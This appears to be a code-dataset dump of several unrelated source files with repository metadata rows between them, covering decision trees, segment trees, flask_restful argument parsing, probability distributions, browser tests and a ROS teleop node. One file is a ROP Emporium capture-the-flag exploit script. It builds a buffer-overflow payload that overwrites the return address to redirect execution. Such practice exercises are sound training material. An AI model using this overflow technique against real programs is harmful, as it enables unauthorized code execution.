(-_get_bias(avPair, dataRowIndexes, data, outcomeIndex), avPair[0], avPair[1], avPair[2])
for avPair in uniqueAttributeValuePairs
)
print( "potentials: " + str(potentials) )
print( "len(potentials) = " + str(len(potentials)) )
print()
return potentials
def _get_continuous_av_pairs(continuousAttrIndexes, data, dataRowIndexes):
avPairs = set()
for attrIndex in continuousAttrIndexes:
sortedAttrValues = [i for i in sorted(data[rowIndex][attrIndex] for rowIndex in dataRowIndexes)]
indexes = _get_discontinuity_indexes(
sortedAttrValues = sortedAttrValues,
maxIndexes = max(
math.sqrt(len(sortedAttrValues)),
min(10,len(sortedAttrValues))
)
)
for index in indexes:
avPairs.add((attrIndex, sortedAttrValues[index], operator.gt))
return avPairs
def _get_discontinuity_indexes(sortedAttrValues, maxIndexes):
indexes = []
for i in _generate_discontinuity_indexes_center_out(sortedAttrValues):
indexes.append(i)
if len(indexes) >= maxIndexes:
break
return indexes
def _generate_discontinuity_indexes_center_out(sortedAttrValues):
# print( "sortedAttrValues: " + str(sortedAttrValues) )
center = len(sortedAttrValues) // 2
left = center - 1
right = center + 1
while left >= 0 or right < len(sortedAttrValues):
if left >= 0:
if sortedAttrValues[left] != sortedAttrValues[left + 1]:
#print(
# "center: " + str(center) + ", " +
# "left: " + str(left) + ", " +
# "right: " + str(right) + "; " +
# "yield: " + str(left)
# )
yield left
left -= 1
if right < len(sortedAttrValues):
if sortedAttrValues[right - 1] != sortedAttrValues[right]:
#print(
# "center: " + str(center) + ", " +
# "left: " + str(left) + ", " +
# "right: " + str(right) + "; " +
# "yield: " + str(right - 1)
# )
yield right - 1
right += 1
def _get_bias(avPair, dataRowIndexes, data, outcomeIndex):
attrIndex, attrValue, isMatch = avPair
matchIndexes = {i for i in dataRowIndexes if isMatch(data[i][attrIndex], attrValue)}
nonMatchIndexes = dataRowIndexes - matchIndexes
matchOutcomes = {data[i][outcomeIndex] for i in matchIndexes}
nonMatchOutcomes = {data[i][outcomeIndex] for i in nonMatchIndexes}
numPureRows = (len(matchIndexes) if len( matchOutcomes) == 1 else 0) \
+ (len(nonMatchIndexes) if len(nonMatchOutcomes) == 1 else 0)
percentPure = numPureRows / len(dataRowIndexes)
numNonPureRows = len(dataRowIndexes) - numPureRows
percentNonPure = 1 - percentPure
split = 1 - abs(len(matchIndexes) - len(nonMatchIndexes)) / len(dataRowIndexes) - .001
splitBias = split * percentNonPure if numNonPureRows > 0 else 0
return splitBias + percentPure
class DTree:
def __init__(self, nodes, attrNames):
self._nodes = nodes
self._attrNames = attrNames
@staticmethod
def _is_leaf(node):
return len(node) == 2
def __str__(self):
s = ''
for node in self._nodes:
if self._is_leaf(node):
s += '{}: {}\n'.format(node[0], node[1])
else:
nodeId, attrIndex, attrValue, isMatch, nodeIdIfMatch, \
nodeIdIfNonMatch, matchCount, nonMatchCount = node
s += '{0}: {1}{7}{2}, {5} Yes->{3}, {6} No->{4}\n'.format(
nodeId, self._attrNames[attrIndex], attrValue,
nodeIdIfMatch, nodeIdIfNonMatch, matchCount,
nonMatchCount, '=' if isMatch == operator.eq else '>')
return s
def get_prediction(self, data):
currentNode = self._nodes[0]
while True:
if self._is_leaf(currentNode):
return currentNode[1]
nodeId, attrIndex, attrValue, isMatch, nodeIdIfMatch, \
nodeIdIfNonMatch = currentNode[:6]
currentNode = self._nodes[nodeIdIfMatch if
isMatch(data[attrIndex], attrValue) else nodeIdIfNonMatch]
| [
"[email protected]"
] | |
2eff427266939ed01872e9d20210444fb49759ed | 7966fa31437cc8a539621a5a0642ce24c1c9de50 | /PycharmProjects/segmentTree/sgrTree.py | 29d3a3b49750c8b91cbbe7e14c980ac9783aa1fe | [] | no_license | crystal30/DataStructure | 4f938508f4c60af9c5f8ec5520d5acedbe2dc90e | c55b0cfd2967a2221c27ed738e8de15034775945 | refs/heads/master | 2021-06-25T17:49:03.048853 | 2021-01-22T00:37:04 | 2021-01-22T00:37:04 | 192,374,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,804 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
class SegTree():
def __init__(self, data):
self.__data = data
self.__tree = [None]*len(data)*4
def getSize(self):
return len(self.__data)
def getIndex(self, index):
return self.getIndex(index)
# 左孩子节点
def __leftChild(self, index):
return index*2 + 1
# 右孩子节点
def __rightChild(self, index):
return index*2 + 2
#融合函数,这里 返回 两个list 相加
def merger(self, a,b):
return a+b
def tree(self):
self.__subTree(0,l=0, r = len(self.__data)-1)
def __subTree(self,index,l, r):
if l==r:
# self.__tree[index] = [self.__data[l]]
self.__tree[index] = self.__data[l]
return
else: # l<r
mid = (r+l) // 2
lChild = self.__leftChild(index)
rChild = self.__rightChild(index)
self.__subTree(lChild, l,mid)
self.__subTree(rChild, mid+1,r)
self.__tree[index] = self.merger(self.__tree[lChild], self.__tree[rChild])
#查询
def query(self,ql, qr):
return self.__query(0, 0, len(self.__data)-1, ql, qr)
def __query(self,treeIndex, l, r, ql, qr):
if l==ql and r == qr:
return self.__tree[treeIndex]
leftChild = self.__leftChild(treeIndex)
rightChild = self.__rightChild(treeIndex)
mid = (l+r) // 2
if qr <= mid:
return self.__query(leftChild, l, mid, ql, qr)
elif ql >= mid+1:
return self.__query(rightChild, mid+1, r, ql, qr)
if ql <= mid and qr > mid:
leftRe = self.__query(leftChild,l,mid,ql, mid)
rightRe = self.__query(rightChild, mid+1, r, mid+1, qr)
return self.merger(leftRe , rightRe)
#更新
def set(self,index,e):
self.__data[index] = e
self.__set(0, 0, len(self.__data)-1, index,e)
def __set(self,treeIndex, l, r, index ,e):
if l == r:
# self.__tree[treeIndex] = [e]
self.__tree[treeIndex] = e
# self.__tree[treeIndex] = [self.__data[l]]
return
mid = l + (r-l)//2
leftChild = self.__leftChild(treeIndex)
rightChild = self.__rightChild(treeIndex)
if index <= mid:
self.__set(leftChild,l,mid,index,e)
elif index >= mid+1:
self.__set(rightChild, mid+1, r, index, e)
self.__tree[treeIndex] = self.merger(self.__tree[leftChild], self.__tree[rightChild])
def __str__(self):
return str(self.__tree)
if __name__ == "__main__":
nums = [-2, 0, 3, -5, 2, -1]
seg = SegTree(nums)
seg.tree()
print(seg)
print(seg.query(2,3))
seg.set(2,5)
print(seg)
| [
"[email protected]"
] | |
f849478cc7761ac222d66b2215c09ce091a114d9 | 6a0a634265957e9dcd26bc80e3304e107fb004d0 | /venvflask/lib/python3.7/site-packages/flask_restful/reqparse.py | 7c33f143a5e14cbfd098613fad892829efa31f54 | [] | no_license | ogutiann/PythonEthereumSmartContracts | 8bd81aa14eab567d41b5dad74b67aba92a405ebd | d870e9fd1c7f68b8493db4c2b2af224f966d8e51 | refs/heads/master | 2023-01-04T14:23:12.396898 | 2020-10-29T12:12:46 | 2020-10-29T12:12:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,660 | py | from copy import deepcopy
try:
from collections.abc import MutableSequence
except ImportError:
from collections import MutableSequence
from flask import current_app, request
from werkzeug.datastructures import MultiDict, FileStorage
from werkzeug import exceptions
import flask_restful
import decimal
import six
class Namespace(dict):
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
self[name] = value
_friendly_location = {
u'json': u'the JSON body',
u'form': u'the post body',
u'args': u'the query string',
u'values': u'the post body or the query string',
u'headers': u'the HTTP headers',
u'cookies': u'the request\'s cookies',
u'files': u'an uploaded file',
}
text_type = lambda x: six.text_type(x)
class Argument(object):
"""
:param name: Either a name or a list of option strings, e.g. foo or
-f, --foo.
:param default: The value produced if the argument is absent from the
request.
:param dest: The name of the attribute to be added to the object
returned by :meth:`~reqparse.RequestParser.parse_args()`.
:param bool required: Whether or not the argument may be omitted (optionals
only).
:param action: The basic type of action to be taken when this argument
is encountered in the request. Valid options are "store" and "append".
:param ignore: Whether to ignore cases where the argument fails type
conversion
:param type: The type to which the request argument should be
converted. If a type raises an exception, the message in the
error will be returned in the response. Defaults to :class:`unicode`
in python2 and :class:`str` in python3.
:param location: The attributes of the :class:`flask.Request` object
to source the arguments from (ex: headers, args, etc.), can be an
iterator. The last item listed takes precedence in the result set.
:param choices: A container of the allowable values for the argument.
:param help: A brief description of the argument, returned in the
response when the argument is invalid. May optionally contain
an "{error_msg}" interpolation token, which will be replaced with
the text of the error raised by the type converter.
:param bool case_sensitive: Whether argument values in the request are
case sensitive or not (this will convert all values to lowercase)
:param bool store_missing: Whether the arguments default value should
be stored if the argument is missing from the request.
:param bool trim: If enabled, trims whitespace around the argument.
:param bool nullable: If enabled, allows null value in argument.
"""
def __init__(self, name, default=None, dest=None, required=False,
ignore=False, type=text_type, location=('json', 'values',),
choices=(), action='store', help=None, operators=('=',),
case_sensitive=True, store_missing=True, trim=False,
nullable=True):
self.name = name
self.default = default
self.dest = dest
self.required = required
self.ignore = ignore
self.location = location
self.type = type
self.choices = choices
self.action = action
self.help = help
self.case_sensitive = case_sensitive
self.operators = operators
self.store_missing = store_missing
self.trim = trim
self.nullable = nullable
def __str__(self):
if len(self.choices) > 5:
choices = self.choices[0:3]
choices.append('...')
choices.append(self.choices[-1])
else:
choices = self.choices
return 'Name: {0}, type: {1}, choices: {2}'.format(self.name, self.type, choices)
def __repr__(self):
return "{0}('{1}', default={2}, dest={3}, required={4}, ignore={5}, location={6}, " \
"type=\"{7}\", choices={8}, action='{9}', help={10}, case_sensitive={11}, " \
"operators={12}, store_missing={13}, trim={14}, nullable={15})".format(
self.__class__.__name__, self.name, self.default, self.dest, self.required, self.ignore, self.location,
self.type, self.choices, self.action, self.help, self.case_sensitive,
self.operators, self.store_missing, self.trim, self.nullable)
def source(self, request):
"""Pulls values off the request in the provided location
:param request: The flask request object to parse arguments from
"""
if isinstance(self.location, six.string_types):
value = getattr(request, self.location, MultiDict())
if callable(value):
value = value()
if value is not None:
return value
else:
values = MultiDict()
for l in self.location:
value = getattr(request, l, None)
if callable(value):
value = value()
if value is not None:
values.update(value)
return values
return MultiDict()
def convert(self, value, op):
# Don't cast None
if value is None:
if self.nullable:
return None
else:
raise ValueError('Must not be null!')
# and check if we're expecting a filestorage and haven't overridden `type`
# (required because the below instantiation isn't valid for FileStorage)
elif isinstance(value, FileStorage) and self.type == FileStorage:
return value
try:
return self.type(value, self.name, op)
except TypeError:
try:
if self.type is decimal.Decimal:
return self.type(str(value))
else:
return self.type(value, self.name)
except TypeError:
return self.type(value)
def handle_validation_error(self, error, bundle_errors):
"""Called when an error is raised while parsing. Aborts the request
with a 400 status and an error message
:param error: the error that was raised
:param bundle_errors: do not abort when first error occurs, return a
dict with the name of the argument and the error message to be
bundled
"""
error_str = six.text_type(error)
error_msg = self.help.format(error_msg=error_str) if self.help else error_str
msg = {self.name: error_msg}
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return error, msg
flask_restful.abort(400, message=msg)
def parse(self, request, bundle_errors=False):
"""Parses argument value(s) from the request, converting according to
the argument's type.
:param request: The flask request object to parse arguments from
:param bundle_errors: Do not abort when first error occurs, return a
dict with the name of the argument and the error message to be
bundled
"""
source = self.source(request)
results = []
# Sentinels
_not_found = False
_found = True
for operator in self.operators:
name = self.name + operator.replace("=", "", 1)
if name in source:
# Account for MultiDict and regular dict
if hasattr(source, "getlist"):
values = source.getlist(name)
else:
values = source.get(name)
if not (isinstance(values, MutableSequence) and self.action == 'append'):
values = [values]
for value in values:
if hasattr(value, "strip") and self.trim:
value = value.strip()
if hasattr(value, "lower") and not self.case_sensitive:
value = value.lower()
if hasattr(self.choices, "__iter__"):
self.choices = [choice.lower()
for choice in self.choices]
try:
value = self.convert(value, operator)
except Exception as error:
if self.ignore:
continue
return self.handle_validation_error(error, bundle_errors)
if self.choices and value not in self.choices:
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return self.handle_validation_error(
ValueError(u"{0} is not a valid choice".format(
value)), bundle_errors)
self.handle_validation_error(
ValueError(u"{0} is not a valid choice".format(
value)), bundle_errors)
if name in request.unparsed_arguments:
request.unparsed_arguments.pop(name)
results.append(value)
if not results and self.required:
if isinstance(self.location, six.string_types):
error_msg = u"Missing required parameter in {0}".format(
_friendly_location.get(self.location, self.location)
)
else:
friendly_locations = [_friendly_location.get(loc, loc)
for loc in self.location]
error_msg = u"Missing required parameter in {0}".format(
' or '.join(friendly_locations)
)
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return self.handle_validation_error(ValueError(error_msg), bundle_errors)
self.handle_validation_error(ValueError(error_msg), bundle_errors)
if not results:
if callable(self.default):
return self.default(), _not_found
else:
return self.default, _not_found
if self.action == 'append':
return results, _found
if self.action == 'store' or len(results) == 1:
return results[0], _found
return results, _found
class RequestParser(object):
"""Enables adding and parsing of multiple arguments in the context of a
single request. Ex::
from flask_restful import reqparse
parser = reqparse.RequestParser()
parser.add_argument('foo')
parser.add_argument('int_bar', type=int)
args = parser.parse_args()
:param bool trim: If enabled, trims whitespace on all arguments in this
parser
:param bool bundle_errors: If enabled, do not abort when first error occurs,
return a dict with the name of the argument and the error message to be
bundled and return all validation errors
"""
def __init__(self, argument_class=Argument, namespace_class=Namespace,
trim=False, bundle_errors=False):
self.args = []
self.argument_class = argument_class
self.namespace_class = namespace_class
self.trim = trim
self.bundle_errors = bundle_errors
def add_argument(self, *args, **kwargs):
"""Adds an argument to be parsed.
Accepts either a single instance of Argument or arguments to be passed
into :class:`Argument`'s constructor.
See :class:`Argument`'s constructor for documentation on the
available options.
"""
if len(args) == 1 and isinstance(args[0], self.argument_class):
self.args.append(args[0])
else:
self.args.append(self.argument_class(*args, **kwargs))
# Do not know what other argument classes are out there
if self.trim and self.argument_class is Argument:
# enable trim for appended element
self.args[-1].trim = kwargs.get('trim', self.trim)
return self
def parse_args(self, req=None, strict=False, http_error_code=400):
"""Parse all arguments from the provided request and return the results
as a Namespace
:param req: Can be used to overwrite request from Flask
:param strict: if req includes args not in parser, throw 400 BadRequest exception
:param http_error_code: use custom error code for `flask_restful.abort()`
"""
if req is None:
req = request
namespace = self.namespace_class()
# A record of arguments not yet parsed; as each is found
# among self.args, it will be popped out
req.unparsed_arguments = dict(self.argument_class('').source(req)) if strict else {}
errors = {}
for arg in self.args:
value, found = arg.parse(req, self.bundle_errors)
if isinstance(value, ValueError):
errors.update(found)
found = None
if found or arg.store_missing:
namespace[arg.dest or arg.name] = value
if errors:
flask_restful.abort(http_error_code, message=errors)
if strict and req.unparsed_arguments:
raise exceptions.BadRequest('Unknown arguments: %s'
% ', '.join(req.unparsed_arguments.keys()))
return namespace
def copy(self):
""" Creates a copy of this RequestParser with the same set of arguments """
parser_copy = self.__class__(self.argument_class, self.namespace_class)
parser_copy.args = deepcopy(self.args)
parser_copy.trim = self.trim
parser_copy.bundle_errors = self.bundle_errors
return parser_copy
def replace_argument(self, name, *args, **kwargs):
""" Replace the argument matching the given name with a new version. """
new_arg = self.argument_class(name, *args, **kwargs)
for index, arg in enumerate(self.args[:]):
if new_arg.name == arg.name:
del self.args[index]
self.args.append(new_arg)
break
return self
def remove_argument(self, name):
""" Remove the argument matching the given name. """
for index, arg in enumerate(self.args[:]):
if name == arg.name:
del self.args[index]
break
return self
| [
"[email protected]"
] | |
f16a59cbded9413a22d9a9d7d5816f14d3b4749e | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part005112.py | f6ccb551e9b49171345708249fe74b4524d23c9a | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,369 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher13068(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({0: 1}), [
(VariableWithCount('i2.2.1.1.1.0', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher13068._instance is None:
CommutativeMatcher13068._instance = CommutativeMatcher13068()
return CommutativeMatcher13068._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 13067
if len(subjects) >= 1 and isinstance(subjects[0], Pow):
tmp1 = subjects.popleft()
subjects2 = deque(tmp1._args)
# State 13069
if len(subjects2) >= 1:
tmp3 = subjects2.popleft()
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.1.1.1', tmp3)
except ValueError:
pass
else:
pass
# State 13070
if len(subjects2) >= 1 and subjects2[0] == Rational(1, 2):
tmp5 = subjects2.popleft()
# State 13071
if len(subjects2) == 0:
pass
# State 13072
if len(subjects) == 0:
pass
# 0: sqrt(v)
yield 0, subst1
subjects2.appendleft(tmp5)
subjects2.appendleft(tmp3)
subjects.appendleft(tmp1)
return
yield
from collections import deque | [
"[email protected]"
] | |
07684dae8331e4090c1d7c0b30f6d7355bdf19e3 | 0a3627e849caf21a0385079dea5bf81d4a281b72 | /ret2win32/pwngetshell.py | b3855cdd460b10fec5f32763e9e33a89877fc403 | [] | no_license | surajsinghbisht054/ROP-Emporium-walkthrough-collection | 7e0b3e4aadb4bf4a901c3788fe9fe8a56d047f0d | 4e9ac3f732c6af5ae5fd65e6ca7e3964fc8a3790 | refs/heads/master | 2020-04-14T13:45:04.356322 | 2019-01-02T19:01:39 | 2019-01-02T19:01:39 | 163,877,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,283 | py | #!/usr/bin/python
from struct import pack
import pwn
# ==================================================
# Usages: (python exp.py; cat) | ./binaryName
# =================================================
#+ ------------------------------------------------------------------ +
#= +----------------------------------------------------------------+ =
#= | | =
#= | _____ ___________ _____ | =
#= | / ___/ ___| ___ \ | __ \ | =
#= | \ `--.\ `--.| |_/ / | | \/_ __ ___ _ _ _ __ | =
#= | `--. \`--. \ ___ \ | | __| '__/ _ \| | | | '_ \ | =
#= | /\__/ /\__/ / |_/ / | |_\ \ | | (_) | |_| | |_) | | =
#= | \____/\____/\____/ \____/_| \___/ \__,_| .__/ | =
#= | | | | =
#= | |_| | =
#= +----------------------------------------------------------------+ =
#= +----------------------------------------------------------------+ =
#= | | =
#= | [email protected] | =
#= | www.bitforestinfo.com | =
#= | | =
#= | Try Smart, Try Hard & Don't Cheat | =
#= +----------------------------------------------------------------+ =
#+ ------------------------------------------------------------------ +
#pwn.context.log_level='debug'
#b = pwn.process('./ret2win32')
#b.recvuntil('>')
# 004 0x00000430 0x08048430 GLOBAL FUNC 16 imp.system
# ?v reloc.fgets
# 0x804a010
#
#
#
# ?v reloc.puts
# 0x804a014
#
# ?v sym.pwnme
# 0x80485f6
#
# ?v sym.imp.puts
# 0x8048420
t_function = 0x08048400 # printf
args = 0x8048710
load = ''
load += pack('I',t_function)
load += 'AAAA' #pack('I', )
load += pack('I', args )
# Buffer
pay = ''
pay += 'A'*40
pay += 'BBBB' # EBP
pay += load # EIP
print pay
#b = pwn.process('./ret2win32')
#b.recvuntil('>')
#b.sendline(pay)
#print pwn.hexdump(b.readall())
#pwn.gdb.attach(b)
#b.interactive()
| [
"[email protected]"
] | |
c6a7fbd32d85a9e5f274cc76bf525b7c4eb7bf77 | 33febf8b617ef66d7086765f1c0bf6523667a959 | /probpy/distributions/uniform.py | 3b06514b722dc180d8f041489b3cc970add316b3 | [] | no_license | JonasRSV/probpy | 857201c7f122461463b75d63e5c688e011615292 | 5203063db612b2b2bc0434a7f2a02c9d2e27ed6a | refs/heads/master | 2022-07-07T06:17:44.504570 | 2020-04-15T14:52:20 | 2020-04-15T14:52:20 | 245,820,195 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,578 | py | import numpy as np
import numba
from typing import Tuple
from probpy.core import Distribution, RandomVariable, Parameter
class Uniform(Distribution):
"""Uniform Distribution"""
a = "a"
b = "b"
@classmethod
def med(cls, a: np.float = None, b: np.float = None) -> RandomVariable:
"""
:param a: lower bound
:param b: upper bound
:return: RandomVariable
"""
if a is None and b is None:
_sample = Uniform.sample
_p = Uniform.p
elif a is None:
def _sample(a: np.ndarray, size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray, a: np.ndarray): return Uniform.p(x, a, b)
elif b is None:
def _sample(b: np.ndarray, size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray, b: np.ndarray): return Uniform.p(x, a, b)
else:
def _sample(size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray): return Uniform.p(x, a, b)
parameters = {
Uniform.a: Parameter((), a),
Uniform.b: Parameter((), b)
}
return RandomVariable(_sample, _p, shape=(), parameters=parameters, cls=cls)
@staticmethod
@numba.jit(nopython=False, forceobj=True)
def sample(a: np.float, b: np.float, size: int = 1) -> np.ndarray:
return np.array(a + np.random.rand(size) * (b - a))
@staticmethod
@numba.jit(nopython=True, forceobj=False)
def fast_p(x: np.ndarray, a: np.float, b: np.float):
return ((a < x) & (x < b)) / (b - a)
@staticmethod
def p(x: np.ndarray, a: np.ndarray, b: np.ndarray) -> np.ndarray:
if type(x) != np.ndarray: x = np.array(x)
if type(a) != np.ndarray: a = np.array(a)
if type(b) != np.ndarray: b = np.array(b)
return Uniform.fast_p(x, a, b)
@staticmethod
def jit_probability(rv: RandomVariable):
a = rv.parameters[Uniform.a].value
b = rv.parameters[Uniform.b].value
_fast_p = Uniform.fast_p
if a is None and b is None:
return _fast_p
elif a is None:
def fast_p(x: np.ndarray, a: np.float):
return _fast_p(x, a, b)
elif b is None:
def fast_p(x: np.ndarray, b: np.float):
return _fast_p(x, a, b)
else:
def fast_p(x: np.ndarray):
return _fast_p(x, a, b)
fast_p = numba.jit(nopython=True, forceobj=False, fastmath=True)(fast_p)
return fast_p
class MultiVariateUniform(Distribution):
"""Multivariate Uniform distribution"""
a = "a"
b = "b"
@classmethod
def med(cls, a: np.ndarray = None, b: np.ndarray = None, dimension: Tuple = None) -> RandomVariable:
"""
:param a: lower bound
:param b: upper bound
:param dimension: dimension of r.v
:return: RandomVariable
"""
if a is None and b is None:
_sample = MultiVariateUniform.sample
_p = MultiVariateUniform.p
shape = dimension
elif a is None:
def _sample(a: np.ndarray, size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray, a: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = b.size
elif b is None:
def _sample(b: np.ndarray, size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray, b: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = a.size
else:
def _sample(size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = a.size
parameters = {
MultiVariateUniform.a: Parameter(shape, a),
MultiVariateUniform.b: Parameter(shape, b)
}
return RandomVariable(_sample, _p, shape=shape, parameters=parameters, cls=cls)
@staticmethod
def sample(a: np.ndarray, b: np.ndarray, size: int = 1) -> np.ndarray:
return a + np.random.rand(size, a.size) * (b - a)
@staticmethod
@numba.jit(nopython=True, fastmath=True, forceobj=False)
def fast_p(x: np.ndarray, a: np.ndarray, b: np.ndarray):
indicator_matrix = ((a < x) & (x < b))
indicator_vector = np.array([np.all(indicator_matrix[i]) for i in range(len(x))])
probability = 1 / np.prod(b - a)
return indicator_vector * probability
@staticmethod
def p(x: np.ndarray, a: np.ndarray, b: np.ndarray) -> np.ndarray:
if type(x) != np.ndarray: x = np.array(x)
if type(a) != np.ndarray: a = np.array(a)
if type(b) != np.ndarray: b = np.array(b)
if x.ndim == 1: x = x.reshape(-1, a.size)
return MultiVariateUniform.fast_p(x, a, b)
@staticmethod
def jit_probability(rv: RandomVariable):
a = rv.parameters[Uniform.a].value
b = rv.parameters[Uniform.b].value
_fast_p = MultiVariateUniform.fast_p
if a is None and b is None:
return _fast_p
elif a is None:
def fast_p(x: np.ndarray, a: np.float):
return _fast_p(x, a, b)
elif b is None:
def fast_p(x: np.ndarray, b: np.float):
return _fast_p(x, a, b)
else:
def fast_p(x: np.ndarray):
return _fast_p(x, a, b)
fast_p = numba.jit(nopython=True, forceobj=False, fastmath=True)(fast_p)
return fast_p
| [
"[email protected]"
] | |
7918ac56d5849d5397eee17e699ba9a45cf94e5f | b2c896ca9f2acb81115708ce6cf8d01396e71a18 | /capybara/tests/session/element/test_matches_selector.py | ff60142d44cd19b211832859a9ff8d2200284aea | [
"MIT"
] | permissive | elliterate/capybara.py | b846f3cb1a712a120361849b378d437775c2c6db | eafd9ac50d02e8b57ef90d767493c8fa2be0739a | refs/heads/master | 2023-08-16T13:56:51.506840 | 2022-01-16T18:04:22 | 2022-01-16T18:04:22 | 64,620,050 | 63 | 22 | MIT | 2022-01-16T18:04:23 | 2016-07-31T23:02:18 | Python | UTF-8 | Python | false | false | 3,002 | py | import pytest
import capybara
class MatchesSelectorTestCase:
@pytest.fixture(autouse=True)
def setup_session(self, session):
session.visit("/with_html")
@pytest.fixture
def element(self, session):
return session.find("//span", text="42")
class TestMatchesSelector(MatchesSelectorTestCase):
def test_is_true_if_the_element_matches_the_given_selector(self, element):
assert element.matches_selector("xpath", "//span") is True
assert element.matches_selector("css", "span.number") is True
def test_is_false_if_the_element_does_not_match_the_given_selector(self, element):
assert element.matches_selector("xpath", "//div") is False
assert element.matches_selector("css", "span.not_a_number") is False
def test_uses_default_selector(self, element):
capybara.default_selector = "css"
assert not element.matches_selector("span.not_a_number")
assert element.matches_selector("span.number")
def test_works_with_elements_located_via_a_sibling_selector(self, element):
sibling = element.sibling("css", "span", text="Other span")
assert sibling.matches_selector("xpath", "//span")
assert sibling.matches_selector("css", "span")
def test_works_with_the_html_element(self, session):
html = session.find("/html")
assert html.matches_selector("css", "html")
def test_discards_all_matches_where_the_given_string_is_not_contained(self, element):
assert element.matches_selector("//span", text="42")
assert not element.matches_selector("//span", text="Doesnotexist")
class TestNotMatchSelector(MatchesSelectorTestCase):
def test_is_false_if_the_element_matches_the_given_selector(self, element):
assert element.not_match_selector("xpath", "//span") is False
assert element.not_match_selector("css", "span.number") is False
def test_is_true_if_the_element_does_not_match_the_given_selector(self, element):
assert element.not_match_selector("xpath", "//div") is True
assert element.not_match_selector("css", "span.not_a_number") is True
def test_uses_default_selector(self, element):
capybara.default_selector = "css"
assert element.not_match_selector("span.not_a_number")
assert not element.not_match_selector("span.number")
def test_works_with_elements_located_via_a_sibling_selector(self, element):
sibling = element.sibling("css", "span", text="Other span")
assert not sibling.not_match_selector("xpath", "//span")
assert sibling.not_match_selector("css", "div")
def test_works_with_the_html_element(self, session):
html = session.find("/html")
assert html.not_match_selector("css", "body")
def test_discards_all_matches_where_the_given_string_is_contained(self, element):
assert not element.not_match_selector("//span", text="42")
assert element.not_match_selector("//span", text="Doesnotexist")
| [
"[email protected]"
] | |
e7d128e1500aba2f7670ba59a46061cdec915f47 | 069d2985895eefe33454e57ff2d85b9fa8aa7fa0 | /run.py | df4f5781aa2fc97d2b52b3f42b8ed9f9d8363f45 | [] | no_license | KIRA009/formbuilder | 8a6dd2949b42560f3b7cbad4b2c00e32e09ff55f | 880fdbe211d80c31870dd8da84e376de9598b738 | refs/heads/master | 2023-02-05T16:42:08.806984 | 2019-07-02T18:34:05 | 2019-07-02T18:34:05 | 194,048,846 | 1 | 1 | null | 2023-02-02T06:32:31 | 2019-06-27T07:52:40 | JavaScript | UTF-8 | Python | false | false | 253 | py | from app_builder import build_app
import os
ROOT_DIR = os.getcwd()
app, db, migrate, login_manager = build_app(app_name=__name__, env_path=ROOT_DIR + '\.env', config_env='SETTINGS')
from myapp.views import *
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
413ca2abc71b33a69400411278b07e243fbf15a8 | e4910c4b436223859d91f3569cadafa69a3c777b | /src/racecar/scripts/keyboard.py | c8c26dd85a147588db69800067b55328e93f0960 | [
"BSD-3-Clause"
] | permissive | pmusau17/F1TenthHardware | 81ae6870e15c1fe39a1f386b8bcfaa653bf2675c | 3ae3ab1cedd89e56db2fbabe24f1c6a79d3553d9 | refs/heads/master | 2023-04-01T09:02:12.635614 | 2021-04-07T16:34:17 | 2021-04-07T16:34:17 | 298,356,593 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,059 | py | #!/usr/bin/env python
import rospy
from racecar.msg import drive_param
from ackermann_msgs.msg import AckermannDriveStamped
import sys, select, termios, tty
keyBindings = {
'w':(1,0),
'd':(1,-1),
'a':(1,1),
's':(-1,0),
}
def getKey():
tty.setraw(sys.stdin.fileno())
select.select([sys.stdin], [], [], 0)
key = sys.stdin.read(1)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
speed = 0.7
turn = 0.5
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('keyboard', anonymous=True)
args = rospy.myargv()[1:]
if(len(args)==1):
racecar_name = args[0]
else:
racecar_name = ''
pub = rospy.Publisher(racecar_name+'/ackermann_cmd_mux/input/teleop', AckermannDriveStamped, queue_size=10)
x = 0
th = 0
status = 0
try:
while(1):
key = getKey()
if key in keyBindings.keys():
x = keyBindings[key][0]
th = keyBindings[key][1]
else:
x = 0
th = 0
if (key == '\x03'):
break
msg = drive_param()
msg.velocity = x*speed
msg.angle = th*turn
rospy.loginfo(str(msg.velocity))
rospy.loginfo(str(msg.angle))
